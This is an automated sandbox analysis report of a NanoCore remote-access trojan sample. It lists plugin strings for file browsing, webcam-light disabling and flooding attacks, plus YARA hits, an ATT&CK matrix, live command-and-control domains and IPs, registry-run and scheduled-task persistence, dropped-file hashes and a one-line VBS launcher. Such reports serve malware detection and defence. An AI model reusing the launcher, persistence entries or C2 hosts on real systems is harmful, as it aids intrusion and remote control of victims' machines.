teAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002D2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002D1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	41 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	11 Scripting	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	1 Scheduled Task/Job	2 Valid Accounts	11 Scripting	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	12 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	Logon Script (Mac)	21 Access Token Manipulation	2 Obfuscated Files or Information	NTDS	37 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Data Encoding	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	312 Process Injection	11 Software Packing	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Remote Access Software	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Scheduled Task/Job	1 DLL Side-Loading	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	1 Non-Application Layer Protocol	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	21 Application Layer Protocol	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	21 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	21 Access Token Manipulation	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	312 Process Injection	Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Hidden Files and Directories	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
P05jmXYKpr.exe	70%	ReversingLabs	Win32.Trojan.Leonem
P05jmXYKpr.exe	68%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	53%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
december2nd.ddns.net	17%	Virustotal		Browse
december2n.duckdns.org	19%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
december2n.duckdns.org	19%	Virustotal		Browse
december2nd.ddns.net	100%	Avira URL Cloud	malware
december2n.duckdns.org	100%	Avira URL Cloud	malware
december2nd.ddns.net	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
december2nd.ddns.net	212.193.30.230	true	true	17%, Virustotal, Browse	unknown
december2n.duckdns.org	192.169.69.26	true	true	19%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
december2nd.ddns.net	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
december2n.duckdns.org	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://google.com	RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.autoitscript.com/autoit3/	P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.193.30.230	december2nd.ddns.net	Russian Federation		57844	SPD-NETTR	true
192.169.69.26	december2n.duckdns.org	United States		23033	WOWUS	true

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	877862
Start date and time:	2023-05-30 06:21:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 7s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	P05jmXYKpr.exe
Original Sample Name:	db555a9de355c70681e2e5f9ed38a335.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/36@16/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.7% (good quality ratio 92.4%) Quality average: 78.9% Quality standard deviation: 29.5%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
TCP Packets have been reduced to 100
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:22:23	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome c:\knmo\boaliim.dat c:\knmo\ikvvfncnn.bmp
06:22:30	API Interceptor	856x Sleep call for process: RegSvcs.exe modified
06:22:31	Task Scheduler	Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
06:22:31	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
06:22:32	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate c:\knmo\Update.vbs
06:22:52	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45152
Entropy (8bit):	6.149629800481177
Encrypted:	false
SSDEEP:	768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
MD5:	2867A3817C9245F7CF518524DFD18F28
SHA1:	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
SHA-256:	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
SHA-512:	7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log

Download File

Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\RarSFX0\Update-ta.l.vbe

Download File

Process:	C:\Users\user\Desktop\P05jmXYKpr.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	34862
Entropy (8bit):	7.091025192719944
Encrypted:	false
SSDEEP:	768:QOD33OD3gOD3WOD3vdOD3iOD3EOD3vTOD3w:J6dT7EXZ7qs
MD5:	998B0027EB59F3283BFBC0E95979CABD
SHA1:	8354C76C835B137935DC8B8576F1902F8670E868
SHA-256:	44F0988D28CF5474A366DEB9CEC3B2BE6AB506AE55656D16A9E826DB5980257D
SHA-512:	8A0912145D4D43D3E20606F6DD6E9EE83BE73C369DFC15999CE0E3BF57E38C4773E11293B7B564DF6381DCA8EAD775FCC7F2639420A6F4DA391E604442570D90
Malicious:	false
Preview:	..'.K.M.Z.4.O.Z.9.4.8.f.Y.f.b.a.V.P.C.o.p.W.6.2.v.b.i.2.3.y.9.0.P.g.c.....'.H.o.1.3.4.z.9.a.8.7.b.....'.w....._..9.>.0.8e].,.=`^......p=.;.jL..i..c..k..MKU..}...9$.\|..{.8..3.....>.X.q....'...._4O..`%.M....9.FT..C./...:3)Y.v..T...zI..#Wh..f#.9.oy@z.3...d..s.LW..pd.."......1.:..)8....)lw.p.16..p....R...M..%.......yu..'.....'..np.u..3.F..t.W......T..Z.J.;...fK..E..q.........w.E.YsGz...i....._...2.y....mh`../.U0z.20F.&..#...`S..KR.,....Sp.f....V...n.-.VE.4+...-..0.\|(?.....k<.....\|.'*.\:$hvJ..A+..v!.7.\h0.....'.j.4.x.3.2.1.P.2.1.9.E.S.4.8.2.h.8.1.2.9.b.3.O.P.P.1.....'.2.0.0.j.3.y.....'.1.3.8.k.1.1.z.V.o.d.A.7.Q.1.F.W.7.....'......T..}...)......u%Yxm.P.v.v..Q...{.4..`.%.....Bm.)K.....!.K7.k.nO....Z...9.........[..^.\...I..(....-0..])O%...?s..R~ .\|......D...7y.......K...G.(./..;..+u2.J.ph..J.....Q.....'..........3.....'.L.9.G.v.6.F.l.O.8.4.U.Y.9.A.t.i.q.8.Z.m.U.7.a.R.....'......tc.Z.c" ''~P...c<....'.).YE...y.h.O.e._E.......q..mo;.........8...\.b2.?.B.....c.

C:\Users\user\AppData\Local\Temp\RarSFX0\Update.vbs

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	77
Entropy (8bit):	4.7227105278432004
Encrypted:	false
SSDEEP:	3:FER/n0eFHEBi/JMMItf5OdPTTQoVH:FER/lFHd/PIt5oPoIH
MD5:	4B6F1A54F2823912817EF376AF2CB300
SHA1:	5DA8FDC368156CE4DBBAF8FC8883AC3D0D1CEF62
SHA-256:	2D77855D782CC56D8C74ECA587E851483F9869AF112A830B1FBDA9FE1FD808D3
SHA-512:	A154C1B1CF86F7239308A77B8548B8BCA1E62E261F04C8BA53CFD74B08B7FA5F4FF3A140AC20E5745FBCD1F48CB56BFF3352E2F3AAB1AA46529C1816F42B1C29
Malicious:	false
Preview:	CreateObject("WScript.Shell").Run "c:\knmo\boaliim.dat c:\knmo\ikvvfncnn.bmp"

C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Download File

Process:	C:\Users\user\Desktop\P05jmXYKpr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	909912
Entropy (8bit):	6.602467450731382
Encrypted:	false
SSDEEP:	24576:sYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaJml:s37+KSbq5e1diEnHaJo
MD5:	D70543055E19B63641C7D5CB908EAEC7
SHA1:	C4CE358B96ACCF34B885B56E49F242B847FBDC6B
SHA-256:	CFC03A739220BEF4F9BDE940B1CEEA4E3041DD7C1129C72F0EACC25CD76D0106
